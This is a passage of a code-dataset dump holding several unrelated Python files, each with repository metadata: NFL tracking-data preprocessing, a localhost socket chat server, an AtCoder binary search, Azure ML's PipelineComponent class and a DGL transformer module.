'unspecified'})\n\n\n# add new features\nplaylist['PlayCount'] = playlist.groupby('PlayerKey').cumcount() + 1\nplaylist['OnSynthetic'] = np.where(playlist.FieldType == \"Synthetic\", 1, 0)\nplaylist['PlaysSynthetic'] = playlist.groupby('PlayerKey').OnSynthetic\\\n .cumsum()\nplaylist['PlaysNatural'] = playlist.PlayCount - playlist.PlaysSynthetic\nplaylist['PctPlaysSynthetic'] = playlist.PlaysSynthetic/playlist.PlayCount\nplaylist['PctPlaysNatural'] = playlist.PlaysNatural/playlist.PlayCount\nplaylist['PlaysInGame'] = playlist.groupby(key_cols[0:2]).PlayKey\\\n .transform(max)\n\n# get rest_days\ngame_ids = playlist.drop_duplicates(key_cols[0:2]).GameID.to_numpy()\ngames_temp = playlist.drop_duplicates(key_cols[0:2])\\\n .reset_index(drop=True)\\\n .groupby('PlayerKey')\\\n .apply(get_rest)\\\n .reset_index(level=0)\\\n .assign(GameID=game_ids)\nplaylist = playlist.merge(games_temp, how='left', on=key_cols[0:2])\n\n\n# Format column\nplaylist['RosterPosition'] = playlist.RosterPosition.str\\\n .replace(' ', '_', regex=False)\n\n# Condense stadium types\ndef condense_stadiums(type_list, cat_, df=playlist):\n idx = playlist.StadiumType.str.lower().str.contains('|'.join(type_list))\n df.loc[idx, 'StadiumType'] = cat_\n return df\n\nunknown = ['cloudy', 'nan']\nclosed = ['dome', 'ind', 'closed']\nopen_ = ['out', 'open', 'heinz', 'oudoor', 'ourdoor', 'bowl']\n\ntype_list = [unknown, closed, open_]\ncats_ = ['unknown', 'closed', 'open']\n\nplaylist['StadiumType'] = playlist.StadiumType.astype(str)\nfor t,c in zip(type_list, cats_):\n playlist = condense_stadiums(t, c)\n\nplaylist.loc[playlist.StadiumType == \"Retractable Roof\", 'StadiumType'] = \"unknown\"\nprint(playlist.StadiumType.unique())\n\n\n\n# Fix temps\nplaylist.loc[playlist.Temperature == -999, 'Temperature'] = np.nan\nplaylist = playlist.fillna({'Temperature': playlist.Temperature.mean()})\nplaylist['Temperature'] = playlist.Temperature.round(0).astype(int)\n\n\n# Condense weather\nplaylist['Weather'] = playlist.Weather.astype(str)\nplaylist = playlist.fillna({'Weather': 'unknown'})\nprecips = ['rain', 'shower', 'snow']\nprecip_idx = playlist.Weather.str.lower()\\\n .str.contains('|'.join(precips))\nplaylist['Weather'] = \"dry\"\nplaylist.loc[precip_idx, 'Weather'] = \"wet\"\nprint(playlist.Weather.unique())\n\n\n# Dummify and 
percentify\nplaylist = pd.get_dummies(playlist, columns=['StadiumType', 'Weather'])\ndummycols = ['Weather_wet', 'Weather_dry',\n 'StadiumType_closed', 'StadiumType_open', 'StadiumType_unknown'\n ]\ndummies = playlist.groupby('PlayerKey')[dummycols].transform('sum')\nplaylist['PctWetWeather'] = dummies.Weather_wet / (playlist.PlayCount)\nplaylist['PctOpenStadium'] = dummies.StadiumType_open / (playlist.PlayCount)\nplaylist = playlist.drop(columns=dummycols)\n\n\n# Check positions\nprint(playlist.groupby('PlayerKey')['RosterPosition', 'Position', 'PositionGroup']\\\n .agg('nunique').hist()) #RosterPosition is most consistent\nplaylist = playlist.drop(columns=['Position', 'PositionGroup'])\n\n\n#%%\n# Add injury data\ninjuries = pd.read_csv('../input/nfl-playing-surface-analytics/InjuryRecord.csv')\nprint(injuries.info())\n\n# Reformat days and keys\ndaycols = injuries.columns[injuries.columns.str.startswith('DM')]\ninjuries['DaysMissed'] = convert_days(injuries, daycols)\ninjuries = convert_keys(injuries).drop(columns=daycols)\n\n# Replace unknown injury plays with last play of game\nlast_plays = playlist[['PlayerKey', 'GameID', 'PlaysInGame']]\\\n .drop_duplicates(key_cols[0:2], keep='last')\ninjuries = injuries.merge(last_plays, how='left', on=key_cols[0:2])\ninjuries.loc[injuries.PlayKey == 0, 'PlayKey'] = injuries.PlaysInGame\ninjuries = injuries.drop(columns=['Surface', 'PlaysInGame'])\ninjuries['Missed1Day'] = np.where(injuries.DaysMissed >=1, 1, 0)\ninjuries['Missed7Days'] = np.where(injuries.DaysMissed >=7, 1, 0)\n\nprint(injuries.Missed1Day.sum()) # this check is good\n\n\n# merge and add features\nplaylist = playlist.merge(injuries, how='left', on=key_cols)\nplaylist['InjuredPlay'] = np.where(playlist.BodyPart.isnull(), 0,\n playlist.PlayCount)\nplaylist['MaxPlayCount'] = playlist.groupby('PlayerKey').PlayCount\\\n .transform(max)\nplaylist['MaxPlayInjured'] = playlist.groupby('PlayerKey').InjuredPlay\\\n .transform(max)\nplaylist['FinalPlay'] = np.where(playlist.MaxPlayInjured == 0,\n playlist.MaxPlayCount,\n playlist.MaxPlayInjured)\n\n# cleanup\nplaylist = playlist.fillna({'BodyPart': 'none',\n 'DaysMissed': 0,\n 'Missed1Day': 0,\n 'Missed7Days': 0\n })\n\nplaylist[['DaysMissed', 'Missed1Day', 'Missed7Days']] = \\\n playlist[['DaysMissed', 'Missed1Day', 'Missed7Days']].astype(int)\n\n\nplaylist.Missed1Day.sum() # this check is good\n\n# Redcue memory\nmr = skmem.MemReducer()\nplaylist = mr.fit_transform(playlist)\nplaylist.sort_values(key_cols).to_parquet('PlayListLabeled.parq')\n\n\n\n\n#%%###############\n## NGS Tracks\n#\n\n# Use pandas chunker\ncsize = 4_000_000 #set this to fit your situation\nchunker = pd.read_csv('../input/nfl-playing-surface-analytics/PlayerTrackData.csv', chunksize=csize)\n\ntracks = []\nmr = skmem.MemReducer()\nfor chunk in tqdm(chunker, total = int(80_000_000/csize)):\n chunk = convert_keys(chunk)\n chunk['event'] = chunk.event.fillna('none')\n floaters = chunk.select_dtypes('float').columns.tolist()\n chunk = mr.fit_transform(chunk, float_cols=floaters)\n tracks.append(chunk)\n\ntracks = pd.concat(tracks)\n\n#%%\ncol_order = [9,10,0,1,2,3,4,6,8,5,7]\ntracks = tracks[[tracks.columns[idx] for idx in col_order]]\n\ntracks['event'] = tracks.event.astype('category')\n\n# two plays stopped on snap - safe to delete 2 rows with null dir, o\ntracks[(tracks.PlayerKey == 39715) &\\\n (tracks.GameID == 18) &\\\n (tracks.PlayKey == 48)]\ntracks[(tracks.PlayerKey == 43489) &\\\n (tracks.GameID == 26) &\\\n (tracks.PlayKey == 53)]\ntracks = 
tracks[~tracks.dir.isnull()].copy()\n\n\n#%% Create core features\ntracks['VelocityIn'] = tracks.dis/0.1 #s in data is too smooth\ntracks['dir_diff'] = (tracks.dir-tracks.dir.shift())\n\ntracks['AccelLateral'] = np.abs(tracks.VelocityIn.shift(-1)\\\n * np.sin(np.deg2rad(tracks.dir_diff))\n ).rolling(3).mean() / 0.1\ntracks['AccelLong'] = np.abs(tracks.VelocityIn.shift(-1)\\\n * np.cos(np.deg2rad(tracks.dir_diff))\\\n - tracks.VelocityIn\n ).rolling(3).mean() / 0.1\n\n\n#%% Make filter for active part of plays\nstart_events = ['ball_snap', 'snap_direct', 'punt', 'kickoff', 'onside_kick']\nend_events = ['tackle', 'out_of_bounds', 'touchdown',\n 'pass_outcome_incomplete', 'pass_outcome_touchdown', \n 'fair_catch']\nbookends = start_events + end_events\ntracks['sig_event'] = np.where(tracks.event.isin(bookends), 1, 0)\ntracks['segment'] = tracks.groupby(key_cols)['sig_event'].cumsum()\n\n\n# Check effectiveness and cut non-active segments\nprint(tracks.groupby(key_cols).segment.max().value_counts(normalize=True))\ntracks = tracks[tracks.segment == 1]\n\nprint(tracks.shape)\ntracks.reset_index(drop=True).to_parquet('PlayerTrackData.parq')\n","repo_name":"sajedjalil/Data-Science-Pipeline-Detector","sub_path":"dataset/nfl-playing-surface-analytics/JohnM/nfl-1standfuture-dataprep.py","file_name":"nfl-1standfuture-dataprep.py","file_ext":"py","file_size_in_byte":8963,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"54"}
{"seq_id":"40610683851","text":"#computer networks final project\n#By: mina mahram/ morva farajzadeh/ zahrafarhadinia\n\nimport os\nimport socket\nimport threading\n\n\nclass Server:\n lrmessage=\"\"\n clients=[]\n def __init__(self):\n self.ssocket=None\n self.ServerListening()\n \n def ServerListening(self):\n self.ssocket=socket.socket(socket.AF_INET, socket.SOCK_STREAM) \n local_ip='127.0.0.1'\n local_port=12345\n self.ssocket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n self.ssocket.bind((local_ip, local_port))\n print(\"Server is running, Open the Client Program!\")\n \n self.ssocket.listen(5)\n self.MessageReceiving()\n \n def receive_messages(self, soc):\n while True:\n incoming_buffer=soc.recv(1024) \n if not incoming_buffer:\n break\n self.lrmessage=incoming_buffer.decode('utf-8')\n if self.lrmessage[:6] == \"<File>\":\n self.lrmessage = self.receive_file(soc, self.lrmessage[6:])\n self.broadcasting(soc) \n soc.close()\n \n def broadcasting(self, senders_socket):\n for client in self.clients:\n socket, (ip, port)=client\n if socket is not senders_socket:\n socket.sendall(self.lrmessage.encode('utf-8'))\n\n def MessageReceiving(self):\n while True:\n client=soc, (ip, port)=self.ssocket.accept()\n self.ClientList(client)\n print('Connected to ', ip, ':', str(port))\n t = threading.Thread(target=self.receive_messages, args=(soc,))\n t.start()\n \n def receive_file(self, soc, file_details):\n user_name, file_type, file_name, file_size = file_details.split(\"<SEPARATOR>\")\n file_name = os.path.basename(file_name)\n file_size = int(file_size)\n print(\"Receiving file: \", file_name, \" of size: \", file_size)\n\n received_bytes = 0\n with open(file_name, \"wb\") as f:\n while True:\n\n bytes_read = soc.recv(1024)\n received_bytes += len(bytes_read)\n if received_bytes >= file_size:\n break\n\n f.write(bytes_read)\n\n\n print(file_name, \" received successfully!\")\n return f\"<File>{user_name}[{file_type}] {os.path.abspath(file_name)}\" \n \n def ClientList(self, client):\n if client not in self.clients:\n 
self.clients.append(client)\n\n\nif __name__==\"__main__\":\n Server()","repo_name":"iahraeza/client-server","sub_path":"server_final.py","file_name":"server_final.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"851155118","text":"# coding=utf-8\n'''\nCreated by Amy Chen on 9/25/2016\n'''\n\nclass CSAirMetro():\n # This function initializes all the city-specific information\n # in order to save the data from the json file\n def __init__(self, code, name, country, continent, timezone, coordinates, population, region):\n self.code = code\n self.name = name\n self.country = country\n self.continent = continent\n self.timezone = timezone\n self.coordinates = coordinates\n self.population = population\n self.region = region","repo_name":"haloamy/CSAir","sub_path":"CSAirMetro.py","file_name":"CSAirMetro.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"13564786451","text":"import sys\n\nN = int(input())\ns = 0\ne = N-1\nprev = -1\n\ndef bi_search(s, e, prev):\n ### Termination condition (forgetting this caused a WA) ###\n if e - s <= 1:\n print('! ' + str(s+1))\n exit()\n ##############################\n m = (s+e)//2\n print('? ' + str(m+1))\n sys.stdout.flush()\n res = int(input())\n if m + 1 == e:\n if prev + res == 1:\n print('! ' + str(m))\n exit()\n prev = res\n if res == 1:\n bi_search(s, m, prev)\n elif res == 0:\n bi_search(m, e, prev)\n\nbi_search(s, e, prev)","repo_name":"sumugit/atcoder","sub_path":"abc/abc299/d.py","file_name":"d.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"}
{"seq_id":"3577690572","text":"import json\nimport logging\nimport re\nimport typing\nfrom collections import Counter\nfrom typing import Dict, List, Optional, Tuple, Union\n\nfrom marshmallow import Schema\n\nfrom azure.ai.ml._restclient.v2022_10_01.models import ComponentVersion, ComponentVersionProperties\nfrom azure.ai.ml._schema import PathAwareSchema\nfrom azure.ai.ml._schema.pipeline.pipeline_component import PipelineComponentSchema\nfrom azure.ai.ml._utils.utils import hash_dict, is_data_binding_expression\nfrom azure.ai.ml.constants._common import ARM_ID_PREFIX, ASSET_ARM_ID_REGEX_FORMAT, COMPONENT_TYPE\nfrom azure.ai.ml.constants._component import ComponentSource, NodeType\nfrom azure.ai.ml.constants._job.pipeline import ValidationErrorCode\nfrom azure.ai.ml.entities._builders import BaseNode, Command\nfrom azure.ai.ml.entities._builders.control_flow_node import ControlFlowNode, LoopNode\nfrom azure.ai.ml.entities._component.component import Component\nfrom azure.ai.ml.entities._inputs_outputs import GroupInput, Input\nfrom azure.ai.ml.entities._job.automl.automl_job import AutoMLJob\nfrom azure.ai.ml.entities._job.pipeline._attr_dict import has_attr_safe, try_get_non_arbitrary_attr\nfrom azure.ai.ml.entities._job.pipeline._pipeline_expression import PipelineExpression\nfrom azure.ai.ml.entities._validation import MutableValidationResult\nfrom azure.ai.ml.exceptions import ErrorCategory, ErrorTarget, ValidationException\n\nmodule_logger = logging.getLogger(__name__)\n\n\nclass PipelineComponent(Component):\n \"\"\"Pipeline component, currently used to store components in an azure.ai.ml.dsl.pipeline.\n\n :param name: Name of the component.\n :type name: str\n :param version: Version of the component.\n :type version: str\n 
:param description: Description of the component.\n :type description: str\n :param tags: Tag dictionary. Tags can be added, removed, and updated.\n :type tags: dict\n :param display_name: Display name of the component.\n :type display_name: str\n :param inputs: Component inputs.\n :type inputs: dict\n :param outputs: Component outputs.\n :type outputs: dict\n :param jobs: Id to components dict inside the pipeline definition.\n :type jobs: Dict[str, ~azure.ai.ml.entities._builders.BaseNode]\n :param is_deterministic: Whether the pipeline component is deterministic.\n :type is_deterministic: bool\n :raises ~azure.ai.ml.exceptions.ValidationException: Raised if PipelineComponent cannot be successfully validated.\n Details will be provided in the error message.\n \"\"\"\n\n def __init__(\n self,\n *,\n name: Optional[str] = None,\n version: Optional[str] = None,\n description: Optional[str] = None,\n tags: Optional[Dict] = None,\n display_name: Optional[str] = None,\n inputs: Optional[Dict] = None,\n outputs: Optional[Dict] = None,\n jobs: Optional[Dict[str, BaseNode]] = None,\n is_deterministic: Optional[bool] = None,\n **kwargs,\n ) -> None:\n kwargs[COMPONENT_TYPE] = NodeType.PIPELINE\n super().__init__(\n name=name,\n version=version,\n description=description,\n tags=tags,\n display_name=display_name,\n inputs=inputs,\n outputs=outputs,\n is_deterministic=is_deterministic,\n **kwargs,\n )\n self._jobs = self._process_jobs(jobs) if jobs else {}\n # for telemetry\n self._job_types, self._job_sources = self._get_job_type_and_source()\n # Private support: create pipeline component from pipeline job\n self._source_job_id = kwargs.pop(\"source_job_id\", None)\n # TODO: set anonymous hash for reuse\n\n def _process_jobs(self, jobs: Dict[str, BaseNode]) -> Dict[str, BaseNode]:\n \"\"\"Process and validate jobs.\n\n :param jobs: A map of node name to node\n :type jobs: Dict[str, BaseNode]\n :return: The processed jobs\n :rtype: Dict[str, BaseNode]\n \"\"\"\n # Remove swept Command\n node_names_to_skip = []\n for node_name, job_instance in jobs.items():\n if isinstance(job_instance, Command) and job_instance._swept is True:\n node_names_to_skip.append(node_name)\n\n for key in node_names_to_skip:\n del jobs[key]\n\n # Set path and validate node type.\n for _, job_instance in jobs.items():\n if isinstance(job_instance, BaseNode):\n job_instance._set_base_path(self.base_path)\n\n if not isinstance(job_instance, (BaseNode, AutoMLJob, ControlFlowNode)):\n msg = f\"Not supported pipeline job type: {type(job_instance)}\"\n raise ValidationException(\n message=msg,\n no_personal_data_message=msg,\n target=ErrorTarget.PIPELINE,\n error_category=ErrorCategory.USER_ERROR,\n )\n return jobs\n\n def _customized_validate(self) -> MutableValidationResult:\n \"\"\"Validate pipeline component structure.\n\n :return: The validation result\n :rtype: MutableValidationResult\n \"\"\"\n validation_result = super(PipelineComponent, self)._customized_validate()\n\n # Validate inputs\n for input_name, input_value in self.inputs.items():\n if input_value.type is None:\n validation_result.append_error(\n yaml_path=\"inputs.{}\".format(input_name),\n message=\"Parameter type unknown, please add type annotation or specify input default value.\",\n error_code=ValidationErrorCode.PARAMETER_TYPE_UNKNOWN,\n )\n\n # Validate all nodes\n for node_name, node in self.jobs.items():\n if isinstance(node, BaseNode):\n # Node inputs will be validated.\n validation_result.merge_with(node._validate(), \"jobs.{}\".format(node_name))\n if 
isinstance(node.component, Component):\n # Validate binding if not remote resource.\n validation_result.merge_with(self._validate_binding_inputs(node))\n elif isinstance(node, AutoMLJob):\n pass\n elif isinstance(node, ControlFlowNode):\n # Validate control flow node.\n validation_result.merge_with(node._validate(), \"jobs.{}\".format(node_name))\n else:\n validation_result.append_error(\n yaml_path=\"jobs.{}\".format(node_name),\n message=f\"Not supported pipeline job type: {type(node)}\",\n )\n\n return validation_result\n\n def _validate_compute_is_set(self, *, parent_node_name=None) -> MutableValidationResult:\n \"\"\"Validate compute in pipeline component.\n\n This function will only be called from pipeline_job._validate_compute_is_set\n when both of the pipeline_job.compute and pipeline_job.settings.default_compute is None.\n Rules:\n - For pipeline node: will call node._component._validate_compute_is_set to validate node compute in sub graph.\n - For general node:\n - If _skip_required_compute_missing_validation is True, validation will be skipped.\n - All the rest of cases without compute will add compute not set error to validation result.\n\n :return: The validation result\n :rtype: MutableValidationResult\n \"\"\"\n\n # Note: do not put this into customized validate, as we would like call\n # this from pipeline_job._validate_compute_is_set\n validation_result = self._create_empty_validation_result()\n no_compute_nodes = []\n parent_node_name = parent_node_name if parent_node_name else \"\"\n for node_name, node in self.jobs.items():\n full_node_name = f\"{parent_node_name}{node_name}.jobs.\"\n if node.type == NodeType.PIPELINE and isinstance(node._component, PipelineComponent):\n validation_result.merge_with(node._component._validate_compute_is_set(parent_node_name=full_node_name))\n continue\n if isinstance(node, BaseNode) and node._skip_required_compute_missing_validation:\n continue\n if has_attr_safe(node, \"compute\") and node.compute is None:\n no_compute_nodes.append(node_name)\n\n for node_name in no_compute_nodes:\n validation_result.append_error(\n yaml_path=f\"jobs.{parent_node_name}{node_name}.compute\",\n message=\"Compute not set\",\n )\n return validation_result\n\n def _get_input_binding_dict(self, node: BaseNode) -> Tuple[dict, dict]:\n \"\"\"Return the input binding dict for each node.\n\n :param node: The node\n :type node: BaseNode\n :return: A 2-tuple of (binding_dict, optional_binding_in_expression_dict)\n :rtype: Tuple[dict, dict]\n \"\"\"\n # pylint: disable=too-many-nested-blocks\n binding_inputs = node._build_inputs()\n # Collect binding relation dict {'pipeline_input': ['node_input']}\n binding_dict, optional_binding_in_expression_dict = {}, {}\n for component_input_name, component_binding_input in binding_inputs.items():\n if isinstance(component_binding_input, PipelineExpression):\n for pipeline_input_name in component_binding_input._inputs.keys():\n if pipeline_input_name not in self.inputs:\n continue\n if pipeline_input_name not in binding_dict:\n binding_dict[pipeline_input_name] = []\n binding_dict[pipeline_input_name].append(component_input_name)\n if pipeline_input_name not in optional_binding_in_expression_dict:\n optional_binding_in_expression_dict[pipeline_input_name] = []\n optional_binding_in_expression_dict[pipeline_input_name].append(pipeline_input_name)\n else:\n if isinstance(component_binding_input, Input):\n component_binding_input = component_binding_input.path\n if is_data_binding_expression(component_binding_input, 
[\"parent\"]):\n # data binding may have more than one PipelineInput now\n for pipeline_input_name in PipelineExpression.parse_pipeline_inputs_from_data_binding(\n component_binding_input\n ):\n if pipeline_input_name not in self.inputs:\n continue\n if pipeline_input_name not in binding_dict:\n binding_dict[pipeline_input_name] = []\n binding_dict[pipeline_input_name].append(component_input_name)\n # for data binding expression \"${{parent.inputs.pipeline_input}}\", it should not be optional\n if len(component_binding_input.replace(\"${{parent.inputs.\" + pipeline_input_name + \"}}\", \"\")):\n if pipeline_input_name not in optional_binding_in_expression_dict:\n optional_binding_in_expression_dict[pipeline_input_name] = []\n optional_binding_in_expression_dict[pipeline_input_name].append(pipeline_input_name)\n return binding_dict, optional_binding_in_expression_dict\n\n def _validate_binding_inputs(self, node: BaseNode) -> MutableValidationResult:\n \"\"\"Validate pipeline binding inputs and return all used pipeline input names.\n\n Mark input as optional if all binding is optional and optional not set. Raise error if pipeline input is\n optional but link to required inputs.\n\n :param node: The node to validate\n :type node: BaseNode\n :return: The validation result\n :rtype: MutableValidationResult\n \"\"\"\n component_definition_inputs = {}\n # Add flattened group input into definition inputs.\n # e.g. Add {'group_name.item': PipelineInput} for {'group_name': GroupInput}\n for name, val in node.component.inputs.items():\n if isinstance(val, GroupInput):\n component_definition_inputs.update(val.flatten(group_parameter_name=name))\n component_definition_inputs[name] = val\n # Collect binding relation dict {'pipeline_input': ['node_input']}\n validation_result = self._create_empty_validation_result()\n binding_dict, optional_binding_in_expression_dict = self._get_input_binding_dict(node)\n\n # Validate links required and optional\n for pipeline_input_name, binding_inputs in binding_dict.items():\n pipeline_input = self.inputs[pipeline_input_name]\n required_bindings = []\n for name in binding_inputs:\n # not check optional/required for pipeline input used in pipeline expression\n if name in optional_binding_in_expression_dict.get(pipeline_input_name, []):\n continue\n if name in component_definition_inputs and component_definition_inputs[name].optional is not True:\n required_bindings.append(f\"{node.name}.inputs.{name}\")\n if pipeline_input.optional is None and not required_bindings:\n # Set input as optional if all binding is optional and optional not set.\n pipeline_input.optional = True\n pipeline_input._is_inferred_optional = True\n elif pipeline_input.optional is True and required_bindings:\n if pipeline_input._is_inferred_optional:\n # Change optional=True to None if is inferred by us\n pipeline_input.optional = None\n else:\n # Raise exception if pipeline input is optional set by user but link to required inputs.\n validation_result.append_error(\n yaml_path=\"inputs.{}\".format(pipeline_input._port_name),\n message=f\"Pipeline optional Input binding to required inputs: {required_bindings}\",\n )\n return validation_result\n\n def _get_job_type_and_source(self) -> Tuple[Dict[str, int], Dict[str, int]]:\n \"\"\"Get job types and sources for telemetry.\n\n :return: A 2-tuple of\n * A map of job type to the number of occurrences\n * A map of job source to the number of occurrences\n :rtype: Tuple[Dict[str, int], Dict[str, int]]\n \"\"\"\n job_types, job_sources = [], []\n for job in 
self.jobs.values():\n job_types.append(job.type)\n if isinstance(job, BaseNode):\n job_sources.append(job._source)\n elif isinstance(job, AutoMLJob):\n # Consider all automl_job has builder type for now,\n # as it's not easy to distinguish their source(yaml/builder).\n job_sources.append(ComponentSource.BUILDER)\n else:\n # Fall back to CLASS\n job_sources.append(ComponentSource.CLASS)\n return dict(Counter(job_types)), dict(Counter(job_sources))\n\n @property\n def jobs(self) -> Dict[str, BaseNode]:\n \"\"\"Return a dictionary from component variable name to component object.\n\n :return: Dictionary mapping component variable names to component objects.\n :rtype: Dict[str, ~azure.ai.ml.entities._builders.BaseNode]\n \"\"\"\n return self._jobs\n\n def _get_anonymous_hash(self) -> str:\n \"\"\"Get anonymous hash for pipeline component.\n\n :return: The anonymous hash of the pipeline component\n :rtype: str\n \"\"\"\n # ideally we should always use rest object to generate hash as it's the same as\n # what we send to server-side, but changing the hash function will break reuse of\n # existing components except for command component (hash result is the same for\n # command component), so we just use rest object to generate hash for pipeline component,\n # which doesn't have reuse issue.\n component_interface_dict = self._to_rest_object().properties.component_spec\n hash_value = hash_dict(\n component_interface_dict,\n keys_to_omit=[\n # omit name since anonymous component will have same name\n \"name\",\n # omit _source since it doesn't impact component's uniqueness\n \"_source\",\n # omit id since it will be set after component is registered\n \"id\",\n # omit version since it will be set to this hash later\n \"version\",\n ],\n )\n return hash_value\n\n @classmethod\n def _load_from_rest_pipeline_job(cls, data: Dict):\n # TODO: refine this?\n # Set type as None here to avoid schema validation failed\n definition_inputs = {p: {\"type\": None} for p in data.get(\"inputs\", {}).keys()}\n definition_outputs = {p: {\"type\": None} for p in data.get(\"outputs\", {}).keys()}\n return PipelineComponent(\n display_name=data.get(\"display_name\"),\n description=data.get(\"description\"),\n inputs=definition_inputs,\n outputs=definition_outputs,\n jobs=data.get(\"jobs\"),\n _source=ComponentSource.REMOTE_WORKSPACE_JOB,\n )\n\n @classmethod\n def _resolve_sub_nodes(cls, rest_jobs):\n from azure.ai.ml.entities._job.pipeline._load_component import pipeline_node_factory\n\n sub_nodes = {}\n if rest_jobs is None:\n return sub_nodes\n for node_name, node in rest_jobs.items():\n # TODO: Remove this ad-hoc fix after unified arm id format in object\n component_id = node.get(\"componentId\", \"\")\n if isinstance(component_id, str) and re.match(ASSET_ARM_ID_REGEX_FORMAT, component_id):\n node[\"componentId\"] = component_id[len(ARM_ID_PREFIX) :]\n if not LoopNode._is_loop_node_dict(node):\n # skip resolve LoopNode first since it may reference other nodes\n # use node factory instead of BaseNode._from_rest_object here as AutoMLJob is not a BaseNode\n sub_nodes[node_name] = pipeline_node_factory.load_from_rest_object(obj=node)\n for node_name, node in rest_jobs.items():\n if LoopNode._is_loop_node_dict(node):\n # resolve LoopNode after all other nodes are resolved\n sub_nodes[node_name] = pipeline_node_factory.load_from_rest_object(obj=node, pipeline_jobs=sub_nodes)\n return sub_nodes\n\n @classmethod\n def _create_schema_for_validation(cls, context) -> Union[PathAwareSchema, Schema]:\n return 
PipelineComponentSchema(context=context)\n\n @classmethod\n def _get_skip_fields_in_schema_validation(cls) -> typing.List[str]:\n # jobs validations are done in _customized_validate()\n return [\"jobs\"]\n\n @classmethod\n def _check_ignored_keys(cls, obj: object) -> List[str]:\n \"\"\"Return ignored keys in obj as a pipeline component when its value be set.\n\n :param obj: The object to examine\n :type obj: object\n :return: List of keys to ignore\n :rtype: List[str]\n \"\"\"\n examine_mapping = {\n \"compute\": lambda val: val is not None,\n \"settings\": lambda val: val is not None and any(v is not None for v in val._to_dict().values()),\n }\n # Avoid new attr added by use `try_get_non...` instead of `hasattr` or `getattr` directly.\n return [k for k, has_set in examine_mapping.items() if has_set(try_get_non_arbitrary_attr(obj, k))]\n\n def _get_telemetry_values(self, *args, **kwargs):\n telemetry_values = super()._get_telemetry_values()\n telemetry_values.update(\n {\n \"source\": self._source,\n \"node_count\": len(self.jobs),\n \"node_type\": json.dumps(self._job_types),\n \"node_source\": json.dumps(self._job_sources),\n }\n )\n return telemetry_values\n\n @classmethod\n def _from_rest_object_to_init_params(cls, obj: ComponentVersion) -> Dict:\n # Pop jobs to avoid it goes with schema load\n jobs = obj.properties.component_spec.pop(\"jobs\", None)\n init_params_dict = super()._from_rest_object_to_init_params(obj)\n if jobs:\n try:\n init_params_dict[\"jobs\"] = PipelineComponent._resolve_sub_nodes(jobs)\n except Exception as e: # pylint: disable=broad-except\n # Skip parse jobs if error exists.\n # TODO: https://msdata.visualstudio.com/Vienna/_workitems/edit/2052262\n module_logger.debug(\"Parse pipeline component jobs failed with: %s\", e)\n return init_params_dict\n\n def _to_dict(self) -> Dict:\n return {**self._other_parameter, **super()._to_dict()}\n\n def _build_rest_component_jobs(self) -> Dict[str, dict]:\n \"\"\"Build pipeline component jobs to rest.\n\n :return: A map of job name to rest objects\n :rtype: Dict[str, dict]\n \"\"\"\n # Build the jobs to dict\n rest_component_jobs = {}\n for job_name, job in self.jobs.items():\n if isinstance(job, (BaseNode, ControlFlowNode)):\n rest_node_dict = job._to_rest_object()\n elif isinstance(job, AutoMLJob):\n rest_node_dict = json.loads(json.dumps(job._to_dict(inside_pipeline=True)))\n else:\n msg = f\"Non supported job type in Pipeline jobs: {type(job)}\"\n raise ValidationException(\n message=msg,\n no_personal_data_message=msg,\n target=ErrorTarget.PIPELINE,\n error_category=ErrorCategory.USER_ERROR,\n )\n rest_component_jobs[job_name] = rest_node_dict\n return rest_component_jobs\n\n def _to_rest_object(self) -> ComponentVersion:\n \"\"\"Check ignored keys and return rest object.\n\n :return: The component version\n :rtype: ComponentVersion\n \"\"\"\n ignored_keys = self._check_ignored_keys(self)\n if ignored_keys:\n module_logger.warning(\"%s ignored on pipeline component %r.\", ignored_keys, self.name)\n component = self._to_dict()\n # add source type to component rest object\n component[\"_source\"] = self._source\n component[\"jobs\"] = self._build_rest_component_jobs()\n component[\"sourceJobId\"] = self._source_job_id\n if self._intellectual_property:\n # hack while full pass through supported is worked on for IPP fields\n component.pop(\"intellectual_property\")\n component[\"intellectualProperty\"] = self._intellectual_property._to_rest_object().serialize()\n properties = ComponentVersionProperties(\n 
component_spec=component,\n description=self.description,\n is_anonymous=self._is_anonymous,\n properties=self.properties,\n tags=self.tags,\n )\n result = ComponentVersion(properties=properties)\n result.name = self.name\n return result\n\n def __str__(self):\n try:\n return self._to_yaml()\n except BaseException: # pylint: disable=broad-except\n return super(PipelineComponent, self).__str__()\n","repo_name":"Azure/azure-sdk-for-python","sub_path":"sdk/ml/azure-ai-ml/azure/ai/ml/entities/_component/pipeline_component.py","file_name":"pipeline_component.py","file_ext":"py","file_size_in_byte":23396,"program_lang":"python","lang":"en","doc_type":"code","stars":3916,"dataset":"github-code","pt":"54"} +{"seq_id":"71587292321","text":"from .attention import *\nfrom .layers import *\nfrom .functions import *\nfrom .embedding import *\nimport dgl.function as fn\nimport torch as th\nimport torch.nn.init as INIT\n\n\nclass UEncoder(nn.Module):\n def __init__(self, layer):\n super(UEncoder, self).__init__()\n self.layer = layer\n self.norm = LayerNorm(layer.size)\n\n def pre_func(self, fields=\"qkv\"):\n layer = self.layer\n\n def func(nodes):\n x = nodes.data[\"x\"]\n norm_x = layer.sublayer[0].norm(x)\n return layer.self_attn.get(norm_x, fields=fields)\n\n return func\n\n def post_func(self):\n layer = self.layer\n\n def func(nodes):\n x, wv, z = nodes.data[\"x\"], nodes.data[\"wv\"], nodes.data[\"z\"]\n o = layer.self_attn.get_o(wv / z)\n x = x + layer.sublayer[0].dropout(o)\n x = layer.sublayer[1](x, layer.feed_forward)\n return {\"x\": x}\n\n return func\n\n\nclass UDecoder(nn.Module):\n def __init__(self, layer):\n super(UDecoder, self).__init__()\n self.layer = layer\n self.norm = LayerNorm(layer.size)\n\n def pre_func(self, fields=\"qkv\", l=0):\n layer = self.layer\n\n def func(nodes):\n x = nodes.data[\"x\"]\n if fields == \"kv\":\n norm_x = x\n else:\n norm_x = layer.sublayer[l].norm(x)\n return layer.self_attn.get(norm_x, fields)\n\n return func\n\n def post_func(self, l=0):\n layer = self.layer\n\n def func(nodes):\n x, wv, z = nodes.data[\"x\"], nodes.data[\"wv\"], nodes.data[\"z\"]\n o = 